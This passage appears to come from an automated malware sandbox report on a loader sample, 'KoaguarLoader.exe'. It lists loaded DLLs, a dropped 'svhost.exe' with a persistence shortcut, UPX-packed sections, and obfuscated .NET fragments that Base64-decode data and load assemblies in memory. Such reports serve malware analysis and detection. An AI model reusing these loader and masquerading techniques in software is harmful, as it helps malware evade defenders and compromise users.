                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\svhost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: svhost.lnk.3.drLNK file: ..\..\..\..\..\svhost.exe
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: KoaguarLoader.exeStatic file information: File size 3343360 > 1048576
                        Source: KoaguarLoader.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x32e200

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: svhost.exe.0.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{z6XG9VNMgzKSI0w.unFXqwBJ68GelpH,z6XG9VNMgzKSI0w.s48HSwTVVklT4LA,z6XG9VNMgzKSI0w.XJMsVfSD4lRIZS8,z6XG9VNMgzKSI0w.sPmSSioJJzPDsiv,fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.yumjM6h7CZGkl79chDMkSEbZqXAktCEjp()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svhost.exe.0.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[2],fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.ynifprEnwqGbE6CNgi4tL8BpTvW93ylYQ(Convert.FromBase64String(jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{z6XG9VNMgzKSI0w.unFXqwBJ68GelpH,z6XG9VNMgzKSI0w.s48HSwTVVklT4LA,z6XG9VNMgzKSI0w.XJMsVfSD4lRIZS8,z6XG9VNMgzKSI0w.sPmSSioJJzPDsiv,fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.yumjM6h7CZGkl79chDMkSEbZqXAktCEjp()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[2],fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.ynifprEnwqGbE6CNgi4tL8BpTvW93ylYQ(Convert.FromBase64String(jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{z6XG9VNMgzKSI0w.unFXqwBJ68GelpH,z6XG9VNMgzKSI0w.s48HSwTVVklT4LA,z6XG9VNMgzKSI0w.XJMsVfSD4lRIZS8,z6XG9VNMgzKSI0w.sPmSSioJJzPDsiv,fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.yumjM6h7CZGkl79chDMkSEbZqXAktCEjp()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[2],fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.ynifprEnwqGbE6CNgi4tL8BpTvW93ylYQ(Convert.FromBase64String(jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svhost.exe.3.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{z6XG9VNMgzKSI0w.unFXqwBJ68GelpH,z6XG9VNMgzKSI0w.s48HSwTVVklT4LA,z6XG9VNMgzKSI0w.XJMsVfSD4lRIZS8,z6XG9VNMgzKSI0w.sPmSSioJJzPDsiv,fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.yumjM6h7CZGkl79chDMkSEbZqXAktCEjp()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svhost.exe.3.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[2],fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.ynifprEnwqGbE6CNgi4tL8BpTvW93ylYQ(Convert.FromBase64String(jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{z6XG9VNMgzKSI0w.unFXqwBJ68GelpH,z6XG9VNMgzKSI0w.s48HSwTVVklT4LA,z6XG9VNMgzKSI0w.XJMsVfSD4lRIZS8,z6XG9VNMgzKSI0w.sPmSSioJJzPDsiv,fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.yumjM6h7CZGkl79chDMkSEbZqXAktCEjp()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[2],fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.ynifprEnwqGbE6CNgi4tL8BpTvW93ylYQ(Convert.FromBase64String(jGMbDgBZof6VgyrDLVKj7LTT4gvd4flRSsdFURlo7B9cawNS5FyFfAFFz60JF85USfoOnPFQ9HjF7OkJLzQRss18KK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        .NET source code contains potential unpacker
                        Source: svhost.exe.0.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: _7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37 System.AppDomain.Load(byte[])
                        Source: svhost.exe.0.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF System.AppDomain.Load(byte[])
                        Source: svhost.exe.0.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: _7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37 System.AppDomain.Load(byte[])
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF System.AppDomain.Load(byte[])
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: _7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37 System.AppDomain.Load(byte[])
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF System.AppDomain.Load(byte[])
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF
                        Source: svhost.exe.3.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: _7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37 System.AppDomain.Load(byte[])
                        Source: svhost.exe.3.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF System.AppDomain.Load(byte[])
                        Source: svhost.exe.3.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: _7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37 System.AppDomain.Load(byte[])
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF System.AppDomain.Load(byte[])
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.cs.Net Code: ABtXL83KmEzSWaBHLhbHrrir8o8sgBuxMjOBt3qn6SZRgcvVXvj4Wu6MdxzqLrx03kJo1giozk1sqtpirv3N5L49AF
                        Source: KoaguarLoader.exe.0.drStatic PE information: section name: UPX2
                        Source: HkqNfKUrMBAD.exe.2.drStatic PE information: section name: UPX2
                        Source: I1y524I4zau1n3u.exe.2.drStatic PE information: section name: UPX2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF93699D2A5 pushad ; iretd 5_2_00007FF93699D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF936B82316 push 8B485F92h; iretd 5_2_00007FF936B8231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF93699D2A5 pushad ; iretd 10_2_00007FF93699D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF93699D2A5 pushad ; iretd 13_2_00007FF93699D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF936ABB8FA push E85A70D7h; ret 13_2_00007FF936ABBAF9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF936AB131D push eax; ret 13_2_00007FF936AB138B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF936B82316 push 8B485F92h; iretd 13_2_00007FF936B8231B
                        Source: svhost.exe.0.dr, 6qLYWbyFK6qWQKW2MkuPmQFT7Q4f9DhTx.csHigh entropy of concatenated method names: 'HB0nHcvGHllU4fCudgsk0k5ZhPL9hVYfa', '_5XpEUURxN68BPDK5cYXoCmenv4tTHtJiP', 'PnTalNGqESallzXuVY3xXhj4eqoXY8ga5', 'VD4a4FMbUq9YEJkvqd', 'opi6fbn7AE78VCKqxA', 'bBZMODwHlaHkIiWoam', 'AVvY9jqnmfbupsLVTQ', 'oRTqijffP2WzGVKQqf', 'orkPLEyg6SvYd8aeqW', 'dQpf4cbfjFubfl3NwQ'
                        Source: svhost.exe.0.dr, PdOOlX6Rtzqfchw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'eN1JIA4zkAsyaD3pChMi7bNrCU0D3oAyM', 'PwozvAvmtdvBFx7DfOHXokWB2K3FjRf3M', 'dB7yd4xFQG5ZOsSIZP3r7VleYmmVHCurV', 'K74BrBicfZZMTVgjVoH9fY6gXgPKuWCYD'
                        Source: svhost.exe.0.dr, s06KECHfaqSu2R0.csHigh entropy of concatenated method names: '_34b6HPpANa7f2zU', 'rlYSW350KSm2Q0n', 'yVdEWbztAmDtwEl', 'NBS38W4O4iwGD7s', 'UGjk0iU36mOFVBw', '_1sNuZOq7sZwBeWe', 'MujzZRRDu6Pyvkr', 'PYDx4z2YfoJ6lo3', '_9cc9fPDukijRsg4', 'txWqTebWeGSxBXP'
                        Source: svhost.exe.0.dr, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csHigh entropy of concatenated method names: 'MyRTOcwgUCRfktTKscSpaYX6Lyxe2mBLXGefeLVy8lz0FbZGsqHmrldQyUHRjvSNJaVLWd8C0xkN5Xdv2xNpZSbxRf', 'McffwUCOjGH47WJcEYTNRVPJmjPaIjMsaKwEChB4c7ot30A1MXxkMnm5jSeYjcJV17CmH8Q9lXn1KWnvbfdgM1MziC', 'zAVqEGWPmkpBqWfqUeBXC3tQykKLbyYq3cKKWGumgTHv5bQm63HG8dAxTL4X0BCTgE6ivtlqwiFyFpmzPQnWi8shgP', 'BpHf1DAMnZq95CUrTmp6juTrJ8sB0Q4NfNYERbgJS51QWCEMydJZnpj8erlyyA74JXPOxhjd2Fa0DfPgtMEn30DP5R', '_1RSde5xnPX0XHMyWsWixoUbZNDTyTIcthJu4hmvJmlN0tbPCeENgUnWmQvmqqYrNydi5V0AxPpVxUrelBe3DpiBzke', 'F0JXH0FVkdQ4JpNOMccvuHVYoyZQi07XTpoFsycGwTgGjHxYjA27baNMKyEPWd0rzsx5AIOdPF3iYsHHtgbXhJGgtH', 'd09DcodNNmAtQwMlWk5K5fBAnVBVFkbbhVq9o2RFraOFTIfJEYfQuikgNdKIDON7rR9JEIwJ3ZNBRV8jQG8D0Pdjba', 'Wt1d6KQipyyiGN38BwnbzG2xtm3CHo6h8AejhyrNXVmdy4J8AjuZ2og9jk10mT7uiBC5vaVHO9YnWSRnx2dEPmxvtl', 'PNhDheFVbxndP8C7m7wFOrJvbDMVHbV0m', 'o0YX5c1UV2izzFDIOA0C9ixOXrFL0CMP6'
                        Source: svhost.exe.0.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.csHigh entropy of concatenated method names: 'fjxx7Cpj8t98HOaueHyLKAhPbi19PhKTWdATPwXCVr5OLA9RVVxQdIJWNWAJLJA9bC7EUaMAKY7luliYJOLJRTJzZH', '_7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37', 'QRGhygyziTFu3beTyypXV5wTeLw87CaoHdxecadIXu3h8UdUh9ulNOFahen8LhsimbOzJj36mKC5lySfVwtD10PQSK', 'gEjyH3vv3xbtNs0ORNHQS7apurMB0PQnOYAepnMEu9RgWL9JmkgcR1sTakxCVrtsKazblpXR88Dyv8uRu1xqSwSZNc', 'uoMpudYCrZJRhsDbx6FNCAx7rd7ToTpD4qbsS5RLbhLYNi2rjobxWl2mNZlVkp9g0zeaEVrtd3bHhW56CgJytTDHlP', '_5Tt4brxHmaF93KJJZg97WrB1MtIBjnqJfrUhVtrX5q9T0kR8gKMV67HcgL2mQNQxRM06ramWMgxbtapzmLaxgD4cy4', 'ydG9SWBXC4D5TX8jN1WwgXulK8tV0MInhRUaEfMwNj3z7SvC4FaIOiuq9FQclGGqoGOnZaYEPyqSmF7ZACt0RVOkBJ', 'DOP1CPrIOR00iOFDLuXOt2WiPwXSQUka8Cvf1OnPI2tVRVpXR6lgUu62lbZZlKLZK2gQLrR1c4OTx0Z3Io3c65ykQx', 'BKbJQzlvGCRJVie80MjWIQMsoJ2UPufRtAm5UMrMjsQInxc4LdrIkifxu21e4kNzBlifSdVfMZEUFROuGeCqSYbmeZ', 'tVamnSKuv7DQDmBf0g3k5GgvGYHwfb9NYMSiVV68N4pKfQ0yyvxu4q74OP5GtPhGPCWZJ5KkBLc2R6ssA7Axyu3sya'
                        Source: svhost.exe.0.dr, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.csHigh entropy of concatenated method names: 'LKxV98wGAo9eL17wRpFLaJ0yq5mplxT6qMTLzFxHpU8MP4iZBXyLftjugZVyX3QQQuBAKpOuNLW534Nk0QbjTylPdz', 'Y5mpNauWmEfU6zZjkV', 'k1q8l88CNNExpjrDUw', 'Zn24Kc7qAgwHXlZ2eQ', 'eYa0ZIJwm9KIm08HDa'
                        Source: svhost.exe.0.dr, E1KFEgHGhH0nvji.csHigh entropy of concatenated method names: 'iQOT3b8MMl29teM', 'b0UvRFf299vpih6', 'DI3hWbTayjELyGq', 'aeY9HYWEiD0FnoN', 'UpwMJwgy7qjCIeH', 'ZquDJCBOV1tLZiD', 'cy2bv1MdT0k1gL5', 'ltfFYDooW1soJs6', 'EWbk2tBnAb6wrvn', 'xITER9TKup2p1wk'
                        Source: svhost.exe.0.dr, mz0y4kDiZLBo1CD8kctviln15Mlav4wWqkiophhSIbAY36tFYR0bzy8aUlhtkDGzMWh01GiNohDriTCeHcUR7oD895.csHigh entropy of concatenated method names: 'HQ4SmufoVeTWvZHMPWE38mJowv0ZqhbBlrHxpGKre8MaENZhXGPam4eUnAeh6qTIBsQvF8YXFwVKjbOJqfuStF4j3D', 'whVwF84cdhqhBlK13F', 'm3GXfGHyogcdXOobmt', 'EK9XryzRcF6AbqBZyj', '_0JFxjjsypx5pg0r4LV'
                        Source: svhost.exe.0.dr, HinmvclvjMV04j4LsLs1R5hhpSJTYBZXnfPuNv9c1JrEyOq6sBV7oTZLjwr6e3IVUwGiigOYcN1IBjL3qkE4kJlIBN.csHigh entropy of concatenated method names: 'TvTk9crAf1vPq1l7tQNMAajN5dO0BIlajnUfjWF1DTfGzmKVVDDW5UCVsc6RbnHgFe0iTKM23LIT7YrIvJGJXjw8fx', '_3WyUne7TIopD6ctftiAb0vgov9HIVn28hXSFdP20sdCpetye5cBMasORZyxCL0rPac8gwCj4wOcQr6OFRWPQIoBpVy', '_4NZOm9t2GJDzuWgo6xRGWdGRCZPx4sw3xsdWbBBEoXF3sRhNLJDMr3j95ioDf4N94fY9fgRv1jhU9opxdZrvA6SJ2Z', '_9qnsjnbHjKKlcUXfAmx6duO7YflZEhnW7at5574mDd3EaQWlechuF1Zhib2dFBnN21fPkclHWtlPfbJWLp1sVKMyrM', 'u6NcUUD2Va1J0dw4jw', 'XOFS6ORvGscpqc8H7d', '_5E61Grpyt0KrY78W70', 'fnmyZe45FG1ll8J6cS', 'GbnyL2c95RcwyGfI3Z', 'Uj9Jfu4uXIR6ZbaK5l'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, 6qLYWbyFK6qWQKW2MkuPmQFT7Q4f9DhTx.csHigh entropy of concatenated method names: 'HB0nHcvGHllU4fCudgsk0k5ZhPL9hVYfa', '_5XpEUURxN68BPDK5cYXoCmenv4tTHtJiP', 'PnTalNGqESallzXuVY3xXhj4eqoXY8ga5', 'VD4a4FMbUq9YEJkvqd', 'opi6fbn7AE78VCKqxA', 'bBZMODwHlaHkIiWoam', 'AVvY9jqnmfbupsLVTQ', 'oRTqijffP2WzGVKQqf', 'orkPLEyg6SvYd8aeqW', 'dQpf4cbfjFubfl3NwQ'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, PdOOlX6Rtzqfchw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'eN1JIA4zkAsyaD3pChMi7bNrCU0D3oAyM', 'PwozvAvmtdvBFx7DfOHXokWB2K3FjRf3M', 'dB7yd4xFQG5ZOsSIZP3r7VleYmmVHCurV', 'K74BrBicfZZMTVgjVoH9fY6gXgPKuWCYD'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, s06KECHfaqSu2R0.csHigh entropy of concatenated method names: '_34b6HPpANa7f2zU', 'rlYSW350KSm2Q0n', 'yVdEWbztAmDtwEl', 'NBS38W4O4iwGD7s', 'UGjk0iU36mOFVBw', '_1sNuZOq7sZwBeWe', 'MujzZRRDu6Pyvkr', 'PYDx4z2YfoJ6lo3', '_9cc9fPDukijRsg4', 'txWqTebWeGSxBXP'
